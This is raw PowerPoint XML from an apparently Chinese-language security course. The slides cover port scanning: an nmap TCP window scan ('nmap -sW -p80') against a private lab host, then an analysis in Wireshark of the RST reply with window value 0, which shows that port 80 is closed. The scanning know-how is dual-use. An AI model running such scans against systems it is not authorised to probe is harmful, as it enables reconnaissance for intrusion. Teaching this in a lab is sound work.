            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5367655" y="1270635"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.使用“nmap -sW -p80 192.168.172.129”命令对目标主机的80端口扫描，如图2-2-44所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5367655" y="1915795"/>
            <a:ext cx="5124450" cy="1866900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="文本框 101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5367655" y="3782695"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-44 nmap TCP窗口扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行TCP窗口值判断的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤五</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>05</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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5" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="文本框 101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5323840" y="827405"/>
            <a:ext cx="5080000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.分析Wireshark抓取的数据包，查看目标主机返回的RST包，返回数据包的Window值为0，所以nmap判定目标主机的80端口是关闭的，如图2-2-45所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5323840" y="2026285"/>
            <a:ext cx="5267325" cy="3676650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="文本框 102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5323840" y="5702935"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-45 返回的RST数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行TCP窗口值判断的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤五</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>05</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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5" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
